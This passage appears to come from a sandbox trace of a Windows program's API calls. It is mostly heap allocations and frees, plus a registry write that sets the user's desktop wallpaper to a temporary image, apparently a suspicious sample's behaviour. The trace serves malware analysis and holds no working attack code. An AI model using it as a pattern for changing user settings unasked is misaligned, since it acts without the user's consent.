lpsz="HKCU") returned 0x4 [0269.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0269.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0269.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0269.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0269.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0269.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0269.698] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x2d0, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0269.698] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0269.698] RegCloseKey (hKey=0x2d0) returned 0x0 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0269.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0269.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0269.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0269.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0269.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0269.700] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0269.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0269.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0269.700] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0269.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0269.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0269.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0269.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1768 [0269.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0269.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0269.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0269.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0269.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1898 [0269.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0269.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0269.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0269.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0269.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0269.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0269.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0269.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0269.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0269.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0269.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0269.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0269.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0269.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0269.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0269.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0269.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0269.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0269.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0269.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0269.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0269.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0269.703] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0269.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0269.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0269.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0269.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0269.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0269.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0269.704] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0269.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0269.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0269.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0269.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0269.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0269.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0269.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0269.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0269.704] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0269.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0269.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0269.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0269.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0269.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0269.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0269.705] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0269.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0269.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0269.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1858 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0269.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0269.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0269.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0269.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0269.707] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0269.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0269.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0269.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0269.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0269.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0269.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0269.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0269.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0269.708] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0269.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0269.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0269.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0269.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0269.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0269.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0269.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0269.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0269.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0269.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0269.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0269.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0269.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0269.709] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0269.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0269.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0269.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0269.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0269.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0269.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0269.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0269.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0269.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0269.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0269.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0269.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0269.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0269.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0269.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0269.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0269.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0269.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0269.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0269.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0269.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0269.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.711] lstrlenW (lpString="75") returned 2 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0269.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0269.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.711] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.711] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.712] RtlAllocateHeap 